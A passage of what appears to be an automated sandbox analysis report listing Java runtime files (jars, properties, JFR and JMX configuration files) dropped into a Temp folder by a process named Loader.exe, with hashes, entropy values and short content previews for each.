                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\javafx.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):58
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4779965120705425
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                                                                                                                                                                                                                                                                                              MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                                                                                                                                                                                                                                                                                              SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                                                                                                                                                                                                                                                                                              SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                                                                                                                                                                                                                                                                                              SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\javaws.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):476286
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.905283162751186
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                                                                                                                                                                                                                                                                                              MD5:5D8C1723F3005BD63DBA2B478CE15621
                                                                                                                                                                                                                                                                                                              SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                                                                                                                                                                                                                                                                                              SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                                                                                                                                                                                                                                                                                              SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jce.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):114950
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.912507028584016
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                                                                                                                                                                                                                                                                                              MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                                                                                                                                                                                                                                                                                              SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                                                                                                                                                                                                                                                                                              SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                                                                                                                                                                                                                                                                                              SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........gwHG................META-INF/MANIFEST.MF.Y....Y.C,j.m.,....z..I &1.m....b........D..+.$t......]....h.o......x...~..?..<@....7#n3.......m../\..u..>.....#......~.K..A..x ..../J...xa..,.._...G...?^...{...>.uj.AQ?^h....c_.pc..W....c.A..`....-.~ak.....^.&.......l.......X.kG.~yg..f......Z..b..L|......4....`..}........mG.o.....kU..*;W.HCU....e.....V..,...1Y.z<.n.A.j.....P..S.($,z........uD".9;..q...k.:p3pW......O...(....\.B...2...#.,.;w.q..k0r.el\F.^.!p..$.....}.9..lhf.P..:.E.&Lf..5.7....W.A.....[7.N}..+.J!.9.Gl.... ...rL.B}.Q.,.'.....@...W.ry[Ok&.......o...dp%..2.\.[2.........fB.p..Xd._.lA....xw..`.r..8...o.....ad}-..;...6....e...F.&e\....'...fA.Db.......%.@..^..U...*..q<.Z.K.T...."r.b...7@8.)4..~.4b....Y.q..u..N..|...e.#.I....4c{.....g.R....]......F.fo.F.u.).F.Z]..(.c|s....u.i..8..=..N%....]...)Xj\..t..w..ql..n.....2..u...|x$7YL.M.?..]..W...m^].~...{....I..{......[-..].f....Sc..c..6..kN.>....7x.k..a7S......8..e.w....*......&.;.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jfr.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):560553
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.781566946934384
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                                                                                                                                                                                                                                                                                              MD5:CCB395235C35C3ACBA592B21138CC6AB
                                                                                                                                                                                                                                                                                                              SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                                                                                                                                                                                                                                                                                              SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                                                                                                                                                                                                                                                                                              SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jfr\default.jfc

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20670
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.627043889535612
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VOMjUVCEM0Ut0ZINFWbqsZSwOVzx8xyxxxbAJ1muS7khPdyPsXZd2ZhptEgReW82:VONVTVgF9SsTMLA
                                                                                                                                                                                                                                                                                                              MD5:47495DA4E7B3AF33F5C3ED1E35AC25AE
                                                                                                                                                                                                                                                                                                              SHA1:F6DE88A4C6AE0C14B9F875FB4BC4721A104CB0EE
                                                                                                                                                                                                                                                                                                              SHA-256:37D19EAC73DEEB613FBB539AE7E7C99339939EB3EFEC44E9EB45F68426E9F159
                                                                                                                                                                                                                                                                                                              SHA-512:74DBEB118575B8881D5B43270EF878162DBDC222AC6D20F04699B2B733427347ABC76D6E82BF7728FCC435129B114E4C75D011FC5DDDEAF5A59E137BBC81F2B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="fals

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jfr\profile.jfc

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20626
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.626761353117893
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VeMjUECOwMsUt0ZINFWbqeZSwOVza8ayaxabAJ1duSikhPdyPsXZd2ZhptEgReWL:VeNEg/gF/ZnixLy
                                                                                                                                                                                                                                                                                                              MD5:5480BEF2CA99090857E5CBF225C12A78
                                                                                                                                                                                                                                                                                                              SHA1:E1F73CA807EC14941656FBE3DB6E5E5D9032041D
                                                                                                                                                                                                                                                                                                              SHA-256:5FB0982C99D6BF258335FB43AAAE91919804C573DFD87B51E05C54ADB3C0392B
                                                                                                                                                                                                                                                                                                              SHA-512:65FE0D6DA17E62CF29875910EB84D57BC5BB667C753369B4F810028C0995E63C322FAD2EB99658B6C19E11E8D2A40CB11B3C09943EB9C0B88F45626579ECE058
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="false">.. <or>.. <test name="

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jfxswt.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33932
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.930702746433849
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:xYJfTGikW6VajSe/SA5vN9kqizE48ojVxQYuW+t:xY5TpkK/nFNIzptjVxYHt
                                                                                                                                                                                                                                                                                                              MD5:C401E00A5DE0DD9723885CEF9E2F5A44
                                                                                                                                                                                                                                                                                                              SHA1:B6735B93811517F062A20869D8A0B57FAEFF6A90
                                                                                                                                                                                                                                                                                                              SHA-256:C6574F4763696F2A83028DE143D9ED1C975062BA2D44CC5C91558751FB84BCD6
                                                                                                                                                                                                                                                                                                              SHA-512:595B950AD5BFF930654BF7FB996BA222D19B4F175821AB0FD6EC4F54D4B7D62B37757429051D1302BC438AB76350B4CD0A07BA712CAECC79DCDB0C60494B5AB2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H.E..Z...g.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..x...R.KRSt.*A.-...M.t....4....sR......K..5y.x..PK...........H................javafx/PK...........H................javafx/embed/PK...........H................javafx/embed/swt/PK...........Hj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....|+...........#.OD..1...1.1.S1....*>..I..TL.....Y..*.S.q.-KAja..6.M.Y7V|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G.*..X.JP....D....8..[3.g...'d.e#Z.|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,*.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>...t

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jsse.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):633957
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.018176262975427
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:ABoQeW0HKwYGORU+ehqEmke1WEAibVR0GPs4j8GgflXhuuMAjYDTj:Uo40WGdNmpb3DP75
                                                                                                                                                                                                                                                                                                              MD5:FD1434C81219C385F30B07E33CEF9F30
                                                                                                                                                                                                                                                                                                              SHA1:0B5EE897864C8605EF69F66DFE1E15729CFCBC59
                                                                                                                                                                                                                                                                                                              SHA-256:BC3A736E08E68ACE28C68B0621DCCFB76C1063BD28D7BD8FCE7B20E7B7526CC5
                                                                                                                                                                                                                                                                                                              SHA-512:9A778A3843744F1FABAD960AA22880D37C30B1CAB29E123170D853C9469DC54A81E81A9070E1DE1BF63BA527C332BB2B1F1D872907F3BDCE33A6898A02FEF22D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........u..H................META-INF/....PK........u..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....E...E...+...com/sun/net/ssl/internal/ssl/Provider.class.......4...............................serialVersionUID...J...ConstantValue.,..c".J-...<init>...()V...Code...LineNumberTable...(Ljava/security/Provider;)V...(Ljava/lang/String;)V...isFIPS...()Z...install...SourceFile...Provider.java......................%com/sun/net/ssl/internal/ssl/Provider...sun/security/ssl/SunJSSE.1.......................................!........*...................)...*............."........*+......................./............."........*+...................3...4.)........................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\jvm.hprof.txt

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4312
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.756104846669624
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:6VprYJmprYJD9Y3t3qFKPG7hLxVJgdTsfbFfcwQoPv:6HrsursD9Y3t36KPG7HyoBQoX
                                                                                                                                                                                                                                                                                                              MD5:AD91D69A4129D31D72FBE288FF967943
                                                                                                                                                                                                                                                                                                              SHA1:CB510AFCDBECEA3538C3F841C0440194573DBB65
                                                                                                                                                                                                                                                                                                              SHA-256:235A50D958FAEDDE808D071705A6D603F97611F568EEC40D7444984B984A4B18
                                                                                                                                                                                                                                                                                                              SHA-512:600BEE4676D26E2CE5B9171582540021509A4D7888C9C7BADC14F0FAD07007E4CE2B4C007A8EB15BD0D977722B8B34442012EA972FFBD72797475A56CDFD86EE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\logging.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2514
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.525846572478507
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:/GXieQT8cg6ZGBjn4stbaWUwO61xFMxO9:OXieW8nBjn4x613Mw9
                                                                                                                                                                                                                                                                                                              MD5:0AA5D5EFDB4F2B92BEBBEB4160AA808B
                                                                                                                                                                                                                                                                                                              SHA1:C6F1B311A4D0790AF8C16C1CA9599D043BA99E90
                                                                                                                                                                                                                                                                                                              SHA-256:A3148336160EA7EF451052D1F435F7C9D96EEB738105AC730358EDADA5BD45A2
                                                                                                                                                                                                                                                                                                              SHA-512:A52C2B784CF0B01A2AF3066F4BB8E7FD890A86CFD82359A22266341942A25333D4C63BA2C02AA43ADE872357FC9C8BBC60D311B2AF2AD2634D60377A2294AFDD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\management-agent.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):381
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.99308306420453
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:5ji0B4r/Rjiszbdy/oocj+sqX2K5YZ5/CUMQxxi6m4xijgxmzbdGh/4:5ji0GJjiIq1cCvXPA/CUMQxoeocx2K/4
                                                                                                                                                                                                                                                                                                              MD5:B608D45DCDD7A4CAD6A63A89A002F683
                                                                                                                                                                                                                                                                                                              SHA1:F6E3BB7050C3B1A3BED9B33122C4A98E6B9A810D
                                                                                                                                                                                                                                                                                                              SHA-256:52CA96531445B437DCA524CB3714FCD8D70221D37A6B9C80F816713C3040DD0A
                                                                                                                                                                                                                                                                                                              SHA-512:407E7CA807826F0E41B085BCA0F54F0134E3B9AC16FA5480EDE02774067DAD46AA07D225BA2981DEC2A7297EA57721EAB8C54E8BED83D352EC6C00ABFDBBF626
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........t..H................META-INF/......PK..............PK........t..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK.....k.......PK..........t..H..............................META-INF/....PK..........t..H...k.....................=...META-INF/MANIFEST.MFPK..........}.........

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\management\jmxremote.access

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4077
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.472483528668558
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:eii7cSoFKfgCe/D4dtQN+wvohSoVGPbPvRZUIpeDMy:eiiISokfXeEk+wQhnMPbnRZR7y
                                                                                                                                                                                                                                                                                                              MD5:41B36D832BE39A3CF0F3D7760E55FDCB
                                                                                                                                                                                                                                                                                                              SHA1:E706E9BE75604A13DFCC5A96B1720A544D76348B
                                                                                                                                                                                                                                                                                                              SHA-256:71A930CBE577CBABB4269650C98D227F739E0D4B9C0B44830DD3D52F5015BE1F
                                                                                                                                                                                                                                                                                                              SHA-512:41E6B8639C1CEB3D09D2FDEEEBA89FFA17C4ED8B1AD0DF1E5AB46C4BF178688D5504DC5A3C854226F7DA23DFA0EDAB0D035D6B56495829F43AAA2A7BABEC4273
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:######################################################################..# Default Access Control File for Remote JMX(TM) Monitoring..######################################################################..#..# Access control file for Remote JMX API access to monitoring...# This file defines the allowed access for different roles. The..# password file (jmxremote.password by default) defines the roles and their..# passwords. To be functional, a role must have an entry in..# both the password and the access files...#..# The default location of this file is $JRE/lib/management/jmxremote.access..# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# (See that file for details)..#..# The file format for password and access files is syntactically the same..# as the Properties file format. The syntax is described in the Javadoc..# for java.util.Properties.load...# A typical access file has multiple

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\management\jmxremote.password.template

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2920
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.545881645777106
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:MRSflLrmpop7JN/PgP8KAeoYsnZyhNMVJKWfVStEqwP0pba:Mkv7ngUZYsnRnfYdhE
                                                                                                                                                                                                                                                                                                              MD5:5DD28AAF5A06C946DF7B223F33482FDF
                                                                                                                                                                                                                                                                                                              SHA1:D09118D402CA3BA625B165ECACE863466D7F4CE9
                                                                                                                                                                                                                                                                                                              SHA-256:24674176A4C0E5EEFB9285691764EA06585D90BBDAF5BF40C4220DE7CA3E3175
                                                                                                                                                                                                                                                                                                              SHA-512:13C6F37E969A5AECE2B2F938FA8EBF6A72C0C173678A026E77C35871E4AE89404585FB1A3516AE2CA336FC47EAB1F3DD2009123ADBA9C437CD76BA654401CBDF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# ----------------------------------------------------------------------..# Template for jmxremote.password..#..# o Copy this template to jmxremote.password..# o Set the user/password entries in jmxremote.password..# o Change the permission of jmxremote.password to read-only..# by the owner...#..# See below for the location of jmxremote.password file...# ----------------------------------------------------------------------....##############################################################..# Password File for Remote JMX Monitoring..##############################################################..#..# Password file for Remote JMX API access to monitoring. This..# file defines the different roles and their passwords. The access..# control file (jmxremote.access by default) defines the allowed..# access for each role. To be functional, a role must have an entry..# in both the password and the access files...#..# Default location of this file is $JRE/lib/management/jmx

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\management\management.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14415
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.623139916889837
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:PLrOKIXaIr8Jzc90OEqfmdbHHHN6pDIdpgzri:PLrOKIXaIgYiOE0mdbHHHNGD4p0+
                                                                                                                                                                                                                                                                                                              MD5:054E093240388F0322604619EF643F18
                                                                                                                                                                                                                                                                                                              SHA1:6E110C2A5D813013E9C57700BE8B0D17896E950C
                                                                                                                                                                                                                                                                                                              SHA-256:BF41D73EAB0DA8222FE24255E1BBF68327FB02B1A4F1E7A81B9C7B539033FFB2
                                                                                                                                                                                                                                                                                                              SHA-512:BD60C6271CDEFFFF4563E6E2CF97C176D86F160092D1FFCBE7EEFE714BA75DDC5FB4E848A5FDBE7A1D1510720D92AF6A176A76DE2CC599F27E4BEAE8E692C5D3
                                                                                                                                                                                                                                                                                                              Malicious:false
